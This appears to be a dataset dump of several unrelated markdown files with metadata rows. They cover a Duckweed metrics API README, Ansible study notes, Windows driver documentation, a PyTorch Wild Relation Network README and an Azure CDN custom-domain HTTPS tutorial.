3. Fire up a Ruby console with `bundle exec irb -r lib/duckweed/token -r
lib/duckweed`
4. Set-up an auth token with `Duckweed::Token.authorize 'secret_token', 'rw'`
5. Run Duckweed using your Rack-compatible server of choice (for example, using
`rackup`)
(Note that you can set up a token with read/write access for internal use, and
set up different tokens with only read access that you can assign to external
services such as Geckoboard and Pingdom.)
## Interface
You interact with Duckweed over a simple HTTP-based API. This means that you
can post events to Duckweed with basically any language that provides a means
of making HTTP requests. You can read event metrics back using the same tools.
It is even possible to script access to Duckweed using the `curl` tool from the
command-line.
All requests require authentication via the `auth_token` query paramter in the
URL, or HTTP Basic Authentication.
### `POST /track/:event`
Notify Duckweed that an event has occurred. Optionally takes a `quantity`
parameter (to indicate that a batch job has caused `:event` to occur a number
of times) and a `timestamp` parameter (useful, for example, when you are
running your Duckweed POST requests from an asynchronous work queue, and you
want the event to be recorded as having taken place when the job was enqueued,
not when it finally ran).
### `GET /count/:event` and `GET /count/:event/:granularity/:quantity`
Ask Duckweed the number of times an event has occurred. Optionally takes
`quantity` (a number) and `granularity` ("minutes", "hours", "days") parameters
so that you can specify the period over which the count should be returned.
Defaults to the last hour with minute-granularity. Also takes an optional
`offset` parameter, which can be used to look further back in time, starting
with older buckets (defaults to 1).
### `GET /histogram/:event`
Returns a JSON object suitable for consumption by Geckoboard which shows the
count of the requested `:event` over time. Respects the usual `quantity`,
`granuarity` and `offset` parameters.
### `GET /accumulate/:event`
Similar to the "histogram" action, but aggregates counts as it moves from older
to newer buckets, showing the additive affect of events over time.
### `POST /multicount`
Like "count" but can be used to query the counts for a large number of events
at once rather than having to make multiple GET requests.
### `GET /check/:event`
Given a `threshold` parameter make sure the count of the specified `:event` is
above the threshold. Returns a "GOOD" or "BAD" string that can be detected by a
monitoring service such as Nagios or Pingdom. Also takes the usual parameters
of `quantity` and `granularity`.
## About Causes (http://www.causes.com/)
We built Duckweed to give us real-time insight into our product's performance
and get rapid feedback on things like application health and experiment
results.
If you'd like to work with us, check out http://www.causes.com/join_us and get
in touch with us at [email protected].
| 44.483871 | 79 | 0.778463 | eng_Latn | 0.998852 |
979cacf696078ee4b7d96d7a31b3e7af6a05d278 | 5,656 | md | Markdown | Session3/README.md | Hexadecimalz/RHCE-Study | 8001843e0ba72afb85bcafbc52ec863c91dce9a7 | [
"Unlicense"
] | null | null | null | Session3/README.md | Hexadecimalz/RHCE-Study | 8001843e0ba72afb85bcafbc52ec863c91dce9a7 | [
"Unlicense"
] | null | null | null | Session3/README.md | Hexadecimalz/RHCE-Study | 8001843e0ba72afb85bcafbc52ec863c91dce9a7 | [
"Unlicense"
] | null | null | null | # Session 3
## ⚗ Variables
> [Variables](https://docs.ansible.com/ansible/latest/reference_appendices/glossary.html#term-Vars-Variables) As opposed to Facts, variables are names of values (they can be simple scalar values – integers, booleans, strings) or complex ones (dictionaries/hashes, lists) that can be used in templates and playbooks. They are declared things, not things that are inferred from the remote system’s current state or nature (which is what Facts are).
For example, see [using_vars.yml](using_vars.yaml) in this file we have several different ways that you can see to declare a variable in your playbook. You can declare separate files for variables, or set separate variables directly within the playbook. In each case, the variable declarations are at the top of the file. It makes sense for variables to be declared at the top of the playbook, just like when coding, since the playbook cannot find the value of something before it is referenced.
Another feature that Ansible allows are encrypted variables, which may include password or other sensitive data. In this example we have included [encrypted_vars.yaml](encrypted_vars.yaml) its password is `session123`.
Some example runs of this playbook:
`ansible-playbook session3/using_vars.yml --vault-password-file session3/decryption_pass.txt`
While we haven't covered Ansible Vault just yet, you can view the contents of the vault file using this command: `ansible-vault edit encrypted_vars.yml` and supply the password `session123`
### 🔭 Other Variable locations
- Variables can also be specified in the `group_vars` folder, which would be variables applied to groups in an inventory.
- Variables can also be specified in the `host_vars` folder, which would be specific to certain hosts, such as variables used only for `node1` in your lab cluster.
### 🔢 Variable Precedence
Variables are not a static declaration and are subject to change based on precedence.
Let's list from LEAST to MOST precedence.
1. Variables supplied in the `host_vars` or `group_vars` folders are applied first.
1. Variables stated in the `vars_files` section of your playbook. The last file in the declaration takes precedence.
1. Variables specified directly in the playbook.
1. Variables specified at the command line with the option `-e` or `--extra-vars`
## Use Ansible Galaxy to Create Roles
1. `ansible-galaxy role init nameoftherole`
1. `ansible-galaxy init --offline offlinerole`
While we aren't covering roles extensively just yet, you should know that you need at a minimum the tasks, vars, and defaults directories at a minimum for your roles. You can also create this structure manually.
## [Facts](https://docs.ansible.com/ansible/latest/reference_appendices/glossary.html#term-Facts)
Ansible by default collects details about nodes it connections to. These are details about the system, such as OS, IP, DNS, etc. Fact gathering can be turned on or off. In some case, it may be preferred to turn off fact gathering to speed up plays.
- 🖥️ at the prompt: `ansible all -m setup -a "filter=ansible_cmdline"`
- 🖥️ at the prompt: `ansible all -m setup -a "filter=ansible_devices"`
- 🖥️ at the prompt: `ansible node2 -m setup -a "filter=ansible_all_ipv4_addresses"`
- 🖥️ at the prompt: `ansible node2 -m setup -a "filter=ansible_hostname"`
## [⏭ Conditionals](https://docs.ansible.com/ansible/latest/reference_appendices/glossary.html#term-When)
Like any good script a conditional will help you decide *if* or *when* you should carry out a task. Ansible helps us carry this out using when. Conditionals can be paired with facts to make them run only when conditions on are system are met, such as have a specific hostname, ip address, or storage device.
See: [using_conditionals.yaml](using_conditionals.yaml)
*📃 conditionals.yml snippet*
```
- name: Print IP Address
debug:
msg:
when: ansible_default_ipv4.address == 192.168.1.35 and ansible_hostname "node1"
- name: Still Print
debug:
msg: Still shows!
when: ansible_default_ipv4.address == " crap" or ansible_hostname == "node1"
```
*📃 conditionals.yml*
```
---
- hosts: all
tasks:
- name: Run a command
shell: echo "Hello World"
register: runout
- name: Print some info
debug:
var: runout
when: "'World' in runout.stdout"
- name: Print out is Disk exists
debug:
msg: "Storage exists!"
when: ansible_device['sda'] is defined
```
You can also put each condition in its own parentheses (ansible_hostname == "x") and (ansible_user_dir == "other"). You can also supply multiple levels of parentheses to have nested conditionals.
You can also try `when: "'World' not in runout.stdout"`
## 📇 Using Facts in Templates
See: [var_template.j2](./var_template.j2)
Ansible is using Jinja2 Templates to make files with specific files and configurations that can be pulled from Ansible facts or variables.
Needs more detail...
## ⁉️ Error Handling
Ansible has several modules to handle errors. Ansible by default will stop running a playbook on the *first* error that it finds, unless another error handling method is defined.
See: [error_handling.yaml](error_handling.yaml)
To prevent Ansible from failing due to an error using `ignore_errors: true` during a play. You can also choose to `ignore_unreachable: true` if the host cannot be connected to. Another key option is to specify a maximum fail percentage with `max_fail_percentage: 40`
Similarly, you can also tell Ansible what it should expect by giving it key information about failure with `failed_when` or `changed_when` | 50.954955 | 496 | 0.756188 | eng_Latn | 0.998599 |
979cfd723066d9e9cf7b6d48003ba037ab8a9d73 | 1,912 | md | Markdown | design/component-guidelines/legacy-touchscreen-and-pen-resources.md | imingc/commercialization-public | 70a2bcf94b61655df50987bfea83d4fc7be443d9 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-01-25T20:02:01.000Z | 2019-01-25T20:02:01.000Z | design/component-guidelines/legacy-touchscreen-and-pen-resources.md | andreiztm/commercialization-public | 9a9565a191bc1ecddb33c9b26e701ae32b0c8d65 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | design/component-guidelines/legacy-touchscreen-and-pen-resources.md | andreiztm/commercialization-public | 9a9565a191bc1ecddb33c9b26e701ae32b0c8d65 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Legacy Touchscreen and Pen Resources
description: The topics in this section present legacy resources for Windows Touchscreen and Pen devices. This information applies to Windows 8 and earlier operating systems.
MSHAttr:
- 'PreferredSiteName:MSDN'
- 'PreferredLib:/library/windows/hardware'
ms.assetid: EADE3BD4-B9F3-493E-A545-DE7A732EB6EF
ms.author: eliotgra
ms.date: 05/02/2017
ms.topic: article
ms.prod: windows-hardware
ms.technology: windows-oem
---
# Legacy Touchscreen and Pen Resources
The topics in this section present legacy resources for Windows Touchscreen and Pen devices. This information applies to Windows 8 and earlier operating systems.
## In this section
<table>
<thead valign="bottom">
<tr class="header">
<th>Topic</th>
<th>Description</th>
</tr>
</thead>
<tbody valign="top">
<tr class="odd">
<td><p>[Windows Pointer Device Data Delivery Protocol](windows-pointer-device-data-delivery-protocol.md)</p></td>
<td><p>This section provides information about Windows 8 devices that support the pen, or touch, functionality.</p></td>
</tr>
<tr class="even">
<td><p>[Legacy Windows Touch Drivers](portal.md)</p></td>
<td><p>This section presents information about how to implement support for Windows Touch devices in Windows 7 and earlier operating systems.</p></td>
</tr>
<tr class="odd">
<td><p>[Windows Precision Touchpad Implementation Guide](windows-precision-touchpad-implementation-guide.md)</p></td>
<td><p>This topic describes how to implement a Windows Precision Touchpad in Windows 8.1. It provides guidelines for how to use the Human Interface Device (HID) protocol to communicate with the Windows host.</p></td>
</tr>
<tr class="even">
<td><p>[Additional Resources](additional-resources.md)</p></td>
<td><p>This topic presents resources for the legacy Windows Touchscreen and Pen devices for Windows 7 and earlier operating systems.</p></td>
</tr>
</tbody>
</table> | 39.833333 | 216 | 0.762029 | eng_Latn | 0.797638 |
979d2b92fa6503fb6ebcc61e87efa944f528f0a3 | 638 | md | Markdown | wiki/1. Home.md | clayne/nl_mcm | b0a6f9a90bde98f32eed20fa9b0e1e9225fd1fce | [
"MIT"
] | 5 | 2021-04-12T17:20:51.000Z | 2021-12-25T18:15:02.000Z | wiki/1. Home.md | clayne/nl_mcm | b0a6f9a90bde98f32eed20fa9b0e1e9225fd1fce | [
"MIT"
] | 13 | 2021-02-16T22:36:51.000Z | 2021-07-27T13:09:02.000Z | wiki/1. Home.md | clayne/nl_mcm | b0a6f9a90bde98f32eed20fa9b0e1e9225fd1fce | [
"MIT"
] | 3 | 2021-05-28T10:26:30.000Z | 2021-12-25T18:15:05.000Z | # Info
Is the wiki up to date?: \

## Quickstart
For a quickstart guide check out [this](https://github.com/MrOctopus/nl_mcm/wiki/2.-Quickstart) link.
## API
Read the corresponding wiki page to a ``.psc`` script for a closer explanation of NL_MCM's new API functionality.
## Special Thanks
A special thanks goes out to:
* The SKSE team
* The SkyUI team
* [Dunc001](https://github.com/dunc001)
* [Fireundubh](https://github.com/fireundubh)
* [Kojak747](https://www.nexusmods.com/users/13953925)
* [Nem](https://github.com/Osmosis-Wrench) | 29 | 113 | 0.736677 | kor_Hang | 0.498236 |
979e0e2b385b6d35a5164211aac6aff041170c76 | 42 | md | Markdown | README.md | zmon/my-2016-class-repo | 9e7e0984f02f5663f832e9d839764eef05da49d1 | [
"MIT"
] | null | null | null | README.md | zmon/my-2016-class-repo | 9e7e0984f02f5663f832e9d839764eef05da49d1 | [
"MIT"
] | null | null | null | README.md | zmon/my-2016-class-repo | 9e7e0984f02f5663f832e9d839764eef05da49d1 | [
"MIT"
] | null | null | null | # my-2016-class-repo
Option Description
| 8.4 | 20 | 0.761905 | kor_Hang | 0.511594 |
979e175a95fa4cc78c833e66a20a5d36ea164fee | 1,887 | md | Markdown | README.md | mikomel/wild-relation-network | cc384b769ee30072b14a64f001fe47dc1650ae4a | [
"MIT"
] | null | null | null | README.md | mikomel/wild-relation-network | cc384b769ee30072b14a64f001fe47dc1650ae4a | [
"MIT"
] | null | null | null | README.md | mikomel/wild-relation-network | cc384b769ee30072b14a64f001fe47dc1650ae4a | [
"MIT"
] | null | null | null | 
# Wild Relation Network
PyTorch implementation of Relation Network [1] and Wild Relation Network [2] for solving Raven's Progressive Matrices.
## Setup
```bash
$ pip install wild_relation_network
```
## Usage
Relation Network:
```python
import torch
from wild_relation_network import RelationNetwork
x = torch.rand(4, 8, 64)
rn = RelationNetwork(
num_objects=8,
object_size=64,
out_size=32,
use_object_triples=False,
use_layer_norm=False
)
logits = rn(x)
logits # torch.Tensor with shape (4, 32)
```
Wild Relation Network:
```python
import torch
from wild_relation_network import WReN
x = torch.rand(4, 16, 160, 160)
wren = WReN(
num_channels=32,
use_object_triples=False,
use_layer_norm=False
)
logits = wren(x)
y_hat = logits.log_softmax(dim=-1)
y_hat # torch.Tensor with shape (4, 8)
```
## Unit tests
```bash
$ python -m pytest tests
```
## Bibliography
[1] Santoro, Adam, et al. "A simple neural network module for relational reasoning." Advances in neural information processing systems. 2017.
[2] Santoro, Adam, et al. "Measuring abstract reasoning in neural networks." International Conference on Machine Learning. 2018.
## Citations
```bibtex
@inproceedings{santoro2017simple,
title={A simple neural network module for relational reasoning},
author={Santoro, Adam and Raposo, David and Barrett, David G and Malinowski, Mateusz and Pascanu, Razvan and Battaglia, Peter and Lillicrap, Timothy},
booktitle={Advances in neural information processing systems},
pages={4967--4976},
year={2017}
}
```
```bibtex
@inproceedings{santoro2018measuring,
title={Measuring abstract reasoning in neural networks},
author={Santoro, Adam and Hill, Felix and Barrett, David and Morcos, Ari and Lillicrap, Timothy},
booktitle={International Conference on Machine Learning},
pages={4477--4486},
year={2018}
}
```
| 24.506494 | 152 | 0.738739 | eng_Latn | 0.718317 |
979eb9165fe46d34f67805e40aa7094eaff4b37a | 2,559 | md | Markdown | windows-driver-docs-pr/stream/ksproperty-quality-error.md | codelux/windows-driver-docs | c83db6595928e018938e46951cc67f32c5a14070 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-11-22T00:11:56.000Z | 2019-11-22T00:11:56.000Z | windows-driver-docs-pr/stream/ksproperty-quality-error.md | codelux/windows-driver-docs | c83db6595928e018938e46951cc67f32c5a14070 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-driver-docs-pr/stream/ksproperty-quality-error.md | codelux/windows-driver-docs | c83db6595928e018938e46951cc67f32c5a14070 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: KSPROPERTY\_QUALITY\_ERROR
description: The KSPROPERTY\_QUALITY\_ERROR property is an optional property that should be implemented if the pin supports quality management.
ms.assetid: a918ef13-f0a7-4eb9-b6ec-dcfec3098c1e
keywords: ["KSPROPERTY_QUALITY_ERROR Streaming Media Devices"]
topic_type:
- apiref
api_name:
- KSPROPERTY_QUALITY_ERROR
api_location:
- ks.h
api_type:
- HeaderDef
ms.date: 11/28/2017
ms.localizationpriority: medium
---
# KSPROPERTY\_QUALITY\_ERROR
The KSPROPERTY\_QUALITY\_ERROR property is an optional property that should be implemented if the pin supports quality management.
## <span id="ddk_ksproperty_quality_error_ks"></span><span id="DDK_KSPROPERTY_QUALITY_ERROR_KS"></span>
### Usage Summary Table
<table>
<colgroup>
<col width="20%" />
<col width="20%" />
<col width="20%" />
<col width="20%" />
<col width="20%" />
</colgroup>
<thead>
<tr class="header">
<th>Get</th>
<th>Set</th>
<th>Target</th>
<th>Property Descriptor Type</th>
<th>Property Value Type</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td><p>Yes</p></td>
<td><p>Yes</p></td>
<td><p>Pin</p></td>
<td><p><a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksidentifier" data-raw-source="[<strong>KSPROPERTY</strong>](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksidentifier)"><strong>KSPROPERTY</strong></a></p></td>
<td><p><a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality" data-raw-source="[<strong>KSQUALITY</strong>](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality)"><strong>KSQUALITY</strong></a></p></td>
</tr>
</tbody>
</table>
Remarks
-------
KSPROPERTY\_QUALITY\_ERROR has a property value of type [**KSQUALITY**](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality). Use this structure to get or set the proportion of frames currently being used and the delta from the optimal frame receipt time.
The class driver does not handle this property; the stream minidriver must provide handling on its own.
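For illustration only, a minimal sketch of how a stream minidriver might complete a get request for this property (the handler name and the g_-prefixed variables are hypothetical; they are not part of the KS headers):
```c
#include <ks.h>
/* Hypothetical get handler for KSPROPERTY_QUALITY_ERROR. */
NTSTATUS MyPinGetQualityError(PIRP Irp, PKSPROPERTY Property, PVOID Data)
{
    PKSQUALITY quality = (PKSQUALITY)Data;     /* caller-supplied KSQUALITY buffer */
    quality->Context = NULL;                   /* context pointer, unused in this sketch */
    quality->Proportion = g_CurrentProportion; /* proportion of frames currently in use */
    quality->DeltaTime = g_CurrentDeltaTime;   /* delta from optimal frame receipt time */
    Irp->IoStatus.Information = sizeof(KSQUALITY);
    return STATUS_SUCCESS;
}
```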
Requirements
------------
<table>
<colgroup>
<col width="50%" />
<col width="50%" />
</colgroup>
<tbody>
<tr class="odd">
<td><p>Header</p></td>
<td>Ks.h (include Ks.h)</td>
</tr>
</tbody>
</table>
## See also
[**KSPROPERTY**](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksidentifier)
[**KSQUALITY**](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality)
| 26.381443 | 292 | 0.724502 | eng_Latn | 0.360349 |
979f72712bbb81b298b3f490b42c88e714b85b96 | 22,971 | md | Markdown | articles/cdn/cdn-custom-ssl.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-09-29T16:59:33.000Z | 2019-09-29T16:59:33.000Z | articles/cdn/cdn-custom-ssl.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cdn/cdn-custom-ssl.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Oktatóanyag - HTTPS konfigurálása Azure CDN egyéni tartományon | Microsoft Docs
description: Ebben az oktatóanyagban megismerheti, hogyan engedélyezheti és tilthatja le a HTTPS-t az Azure CDN-végpont egyéni tartományában.
services: cdn
documentationcenter: ''
author: mdgattuso
manager: danielgi
editor: ''
ms.assetid: 10337468-7015-4598-9586-0b66591d939b
ms.service: azure-cdn
ms.workload: media
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: tutorial
ms.date: 06/17/2019
ms.author: magattus
ms.custom: mvc
ms.openlocfilehash: f22273a28d5e4207712bdba71ef788629d51916e
ms.sourcegitcommit: 4b431e86e47b6feb8ac6b61487f910c17a55d121
ms.translationtype: MT
ms.contentlocale: hu-HU
ms.lasthandoff: 07/18/2019
ms.locfileid: "68321666"
---
# <a name="tutorial-configure-https-on-an-azure-cdn-custom-domain"></a>Tutorial: Configure HTTPS on an Azure CDN custom domain
This tutorial shows how to enable the HTTPS protocol for a custom domain that's associated with an Azure CDN endpoint. By using the HTTPS protocol on your custom domain (for example, https:\//www.contoso.com), you ensure that sensitive data is delivered securely via TLS/SSL encryption when it's sent across the internet. When a web browser connects to a website via HTTPS, it validates the website's security certificate and verifies that it was issued by a legitimate certificate authority. This process provides protection for your web applications against attacks.
Azure CDN supports HTTPS on a CDN endpoint hostname by default. For example, if you create a CDN endpoint (such as https:\//contoso.azureedge.net), HTTPS is automatically enabled.
Some of the key attributes of the custom HTTPS feature are:
- No additional cost: There are no costs for certificate acquisition or renewal, and no additional cost for HTTPS traffic. You pay only for GB egress from the CDN.
- Simple enablement: One-click provisioning is available from the [Azure portal](https://portal.azure.com). You can also use REST APIs or other developer tools to enable the feature.
- Complete certificate management is available: All certificate procurement and management is handled for you. Certificates are automatically provisioned and renewed before they expire, so you don't need to worry about a service interruption due to an expired certificate.
In this tutorial, you learn how to:
> [!div class="checklist"]
> - Enable the HTTPS protocol on your custom domain
> - Use a CDN-managed certificate
> - Use your own certificate
> - Validate the domain
> - Disable the HTTPS protocol on your custom domain
## <a name="prerequisites"></a>Prerequisites
[!INCLUDE [updated-for-az](../../includes/updated-for-az.md)]
Before you can complete the steps in this tutorial, you must first create a CDN profile and at least one CDN endpoint. For more information, see [Quickstart: Create an Azure CDN profile and endpoint](cdn-create-new-endpoint.md).
In addition, you must associate an Azure CDN custom domain with your CDN endpoint. For more information, see [Tutorial: Add a custom domain to your Azure CDN endpoint](cdn-map-content-to-custom-domain.md)
> [!IMPORTANT]
> CDN-managed certificates are not available for root or apex domains. If your Azure CDN custom domain is a root or apex domain, you must use the bring-your-own-certificate feature.
>
---
## <a name="ssl-certificates"></a>SSL certificates
To enable HTTPS on an Azure CDN custom domain and deliver content securely, you must use an SSL certificate. You can use a certificate that is managed by Azure CDN, or you can use your own certificate.
# <a name="option-1-default-enable-https-with-a-cdn-managed-certificatetaboption-1-default-enable-https-with-a-cdn-managed-certificate"></a>[Option 1 (default): Enable HTTPS with a CDN-managed certificate](#tab/option-1-default-enable-https-with-a-cdn-managed-certificate)
When you use a CDN-managed certificate, the HTTPS feature can be turned on with just a few clicks. Azure CDN completely handles certificate management tasks such as procurement and renewal. After you enable the feature, the process starts immediately. If the custom domain is already mapped to the CDN endpoint, no further action is required; Azure CDN processes the steps and completes your request automatically. However, if your custom domain is mapped elsewhere, you must confirm your ownership of the domain by email.
To enable HTTPS on a custom domain, follow these steps:
1. In the [Azure portal](https://portal.azure.com), browse to your **Azure CDN Standard from Microsoft**, **Azure CDN Standard from Akamai**, **Azure CDN Standard from Verizon**, or **Azure CDN Premium from Verizon** profile.
2. In the list of CDN endpoints, select the endpoint containing your custom domain.
   
   The **Endpoint** page appears.
3. In the list of custom domains, select the custom domain for which you want to enable HTTPS.
   
   The **Custom domain** page appears.
4. Under Certificate management type, select **CDN managed**.
5. Select **On** to enable HTTPS.
   
6. Continue to [Validate the domain](#validate-the-domain).
# <a name="option-2-enable-https-with-your-own-certificatetaboption-2-enable-https-with-your-own-certificate"></a>[Option 2: Enable HTTPS with your own certificate](#tab/option-2-enable-https-with-your-own-certificate)
> [!IMPORTANT]
> This option is available only with **Azure CDN from Microsoft** and **Azure CDN from Verizon** profiles.
>
You can use your own certificate to enable the HTTPS feature. This process is done through an integration with Azure Key Vault, which allows you to store your certificates securely. Azure CDN uses this secure mechanism to get your certificate, and it requires a few extra steps. You must create the SSL certificate with an allowed certificate authority (CA); otherwise, if you use a non-allowed CA, your request will be rejected. For a list of allowed CAs, see [Allowed certificate authorities for enabling custom HTTPS on Azure CDN](cdn-troubleshoot-allowed-ca.md). For **Azure CDN from Verizon**, any valid CA is accepted.
### <a name="prepare-your-azure-key-vault-account-and-certificate"></a>Prepare your Azure Key Vault account and certificate
1. Azure Key Vault: You must have a running Azure Key Vault account under the same subscription as the Azure CDN profile and CDN endpoints that you want to enable custom HTTPS for. If you don't have an Azure Key Vault account, create one.
2. Azure Key Vault certificates: If you already have a certificate, you can upload it directly to your Azure Key Vault account, or you can create a new certificate directly through Azure Key Vault from one of the partner certificate authorities that Azure Key Vault integrates with.
### <a name="register-azure-cdn"></a>Register Azure CDN
Register Azure CDN as an app in your Azure Active Directory via PowerShell.
1. If needed, install [Azure PowerShell](/powershell/azure/install-az-ps) on your local machine.
2. In PowerShell, run the following command:
`New-AzADServicePrincipal -ApplicationId "205478c0-bd83-4e1b-a9d6-db63a3e1e1c8"`

### <a name="grant-azure-cdn-access-to-your-key-vault"></a>Hozzáférés biztosítása az Azure CDN számára a Key Vaulthoz
Adjon engedélyt az Azure CDN számára, hogy hozzáférhessen az Azure Key Vault-fiókjában tárolt tanúsítványokhoz (titkos kódokhoz).
1. A Key Vault-fiók BEÁLLÍTÁSOK területén válassza a **Hozzáférési szabályzatok**, majd az **Új hozzáadása** lehetőséget új szabályzat létrehozásához.

2. A **Rendszerbiztonsági tag kijelölése** alatt keressen rá a **205478c0-bd83-4e1b-a9d6-db63a3e1e1c8** azonosítóra és jelölje ki a **Microsoft.Azure.Cdn** elemet. Kattintson a **Kiválasztás** gombra.

3. A **Titkos kód engedélyei** területen kattintson a **Lekérdezés** elemre, hogy engedélyezze a CDN számára az engedélyek elvégzését a tanúsítványok listájának lekérdezéséhez.
4. Kattintson az **OK** gombra.
Az Azure CDN most már hozzáférhet a Key Vaulthoz és az abban tárolt tanúsítványokhoz (titkos kódokhoz).
### <a name="select-the-certificate-for-azure-cdn-to-deploy"></a>Az Azure CDN által üzembe helyezendő tanúsítvány kiválasztása
1. Lépjen vissza az Azure CDN portálra, és válassza ki a profilt és CDN-végpontot, amelyhez engedélyezni szeretné az egyéni HTTPS-t.
2. Az egyéni tartományok listájából válassza ki azt az egyéni tartományt, amelyen engedélyezni szeretné a HTTPS-t.
Megjelenik az **Egyéni tartomány** lap.
3. A Tanúsítványkezelés típusa területen válassza a **Saját tanúsítvány használata** lehetőséget.

4. Válassza ki a Key Vaultot, a tanúsítványt (titkos kódot) és a tanúsítványverziót.
Az Azure CDN a következő információkat jeleníti meg:
- Az előfizetés azonosítójához tartozó Key Vault-fiókok.
- A kiválasztott Key Vaultban található tanúsítványok (titkos kódok).
- A tanúsítvány elérhető verziói.
5. Válassza a **Bekapcsolás** lehetőséget a HTTPS engedélyezéséhez.
6. Saját tanúsítvány használatakor nem szükséges tartományérvényesítés. Lépjen tovább a [Várakozás a propagálásra](#wait-for-propagation) részhez.
---
## <a name="validate-the-domain"></a>Validate the domain
If you already have a custom domain in use that is mapped to your custom endpoint with a CNAME record, or if you're using your own certificate, continue to
[Custom domain is mapped to your CDN endpoint](#custom-domain-is-mapped-to-your-cdn-endpoint-by-a-cname-record). Otherwise, if the CNAME record entry for your endpoint no longer exists or it contains the cdnverify subdomain, continue to [Custom domain is not mapped to your CDN endpoint](#custom-domain-is-not-mapped-to-your-cdn-endpoint).
### <a name="custom-domain-is-mapped-to-your-cdn-endpoint-by-a-cname-record"></a>Custom domain is mapped to your CDN endpoint by a CNAME record
When you added a custom domain to your endpoint, you created a CNAME record in the DNS table of your domain registrar to map it to your CDN endpoint hostname. If that CNAME record still exists and does not contain the cdnverify subdomain, the DigiCert CA uses it to automatically validate ownership of your custom domain.
If you're using your own certificate, domain validation is not required.
Your CNAME record should be in the following format, where *Name* is your custom domain name and *Value* is your CDN endpoint hostname:
| Name | Type | Value |
|-----------------|-------|-----------------------|
| <www.contoso.com> | CNAME | contoso.azureedge.net |
For more information about CNAME records, see [Create the CNAME DNS record](https://docs.microsoft.com/azure/cdn/cdn-map-content-to-custom-domain).
If your CNAME record is in the correct format, DigiCert automatically verifies your custom domain name and creates a dedicated certificate for it. DigiCert won't send you a verification email, and you won't need to approve the request. The certificate is valid for one year and is auto-renewed before it expires. Continue to [Wait for propagation](#wait-for-propagation).
Automatic validation typically takes a few hours. If you don't see your domain validated within 24 hours, open a support ticket.
>[!NOTE]
>If you have a Certificate Authority Authorization (CAA) record with your DNS provider, it must include DigiCert as a valid CA. A CAA record allows domain owners to specify with their DNS providers which CAs are authorized to issue certificates for their domain. If a CA receives an order for a certificate for a domain that has a CAA record and that CA is not listed as an authorized issuer, it is prohibited from issuing the certificate to that domain or subdomain. For information about managing CAA records, see [Manage CAA records](https://support.dnsimple.com/articles/manage-caa-record/). For a CAA record tool, see [CAA Record Helper](https://sslmate.com/caa/).
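For illustration, a CAA record that authorizes DigiCert might look like the following hypothetical zone-file entry (contoso.com is a placeholder):
```
contoso.com.  IN  CAA  0 issue "digicert.com"
```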
### <a name="custom-domain-is-not-mapped-to-your-cdn-endpoint"></a>Custom domain is not mapped to your CDN endpoint
>[!NOTE]
>If you're using **Azure CDN from Akamai**, you must map your custom domain to your CDN endpoint with a CNAME record, as described earlier. This feature is currently in the backlog.
If the CNAME record entry for your endpoint contains the cdnverify subdomain, follow the rest of the instructions in this step.
DigiCert sends a verification email to the following email addresses. Verify that you can approve the request directly from one of the following addresses:
admin@<your-domain-name.com>
administrator@<your-domain-name.com>
webmaster@<your-domain-name.com>
hostmaster@<your-domain-name.com>
postmaster@<your-domain-name.com>
Within a few minutes, you should receive an email similar to the following, asking you to approve the request. If you use a spam filter, add [email protected] to its allowlist. If you don't receive an email within 24 hours, contact Microsoft support.
When you click the approval link, you're directed to the following online approval form:
Follow the instructions on the form; you have two verification options:
- You can approve all future orders placed through the same account for the same root domain; for example, contoso.com. This approach is recommended if you plan to add additional custom domains for the same root domain.
- You can approve just the specific host name used in this request. Additional approval is required for subsequent requests.
After approval, DigiCert completes the certificate creation for your custom domain name. The certificate is valid for one year and will be auto-renewed before it expires.
## <a name="wait-for-propagation"></a>Wait for propagation
After the domain name is validated, it can take 6-8 hours for the custom domain HTTPS feature to be activated. When the process is complete, the custom HTTPS status in the Azure portal changes to **Enabled**, and the four operation steps in the custom domain dialog are marked as complete. Your custom domain is now ready to use HTTPS.
### <a name="operation-progress"></a>Operation progress
The following table shows the progress of the operation that occurs when you enable HTTPS. After you enable HTTPS, four operation steps appear in the custom domain dialog. As each step becomes active, additional substep details appear under it as the process advances. Not all of these substeps will occur. After a step completes successfully, a green check mark appears next to it.
| Operation step | Operation substep details |
| --- | --- |
| 1\. Submitting request | Submitting request |
| | Your HTTPS request is being submitted. |
| | Your HTTPS request has been submitted successfully. |
| 2\. Domain validation | Your domain is automatically validated if it is mapped to the CDN endpoint by a CNAME record. Otherwise, a verification request is sent to the email address listed in your domain's registration record (the WHOIS registrant). Please verify the domain as soon as possible. |
| | Your domain ownership has been successfully validated. |
| | The domain ownership validation request expired (the customer likely didn't respond within 6 days). HTTPS won't be enabled on your domain. * |
| | The domain ownership validation request was rejected by the customer. HTTPS won't be enabled on your domain. * |
| 3\. Certificate provisioning | The certificate authority is currently issuing the certificate needed to enable HTTPS on your domain. |
| | The certificate has been issued and is currently being deployed to the CDN network. This process can take up to six hours. |
| | The certificate has been successfully deployed to the CDN network. |
| 4\. Complete | HTTPS has been successfully enabled on your domain. |
\* This message doesn't appear unless an error has occurred.
If an error occurs before the request is submitted, the following error message is displayed:
<code>
We encountered an unexpected error while processing your HTTPS request. Please try again and contact support if the issue persists.
</code>
## <a name="clean-up-resources---disable-https"></a>Clean up resources - disable HTTPS
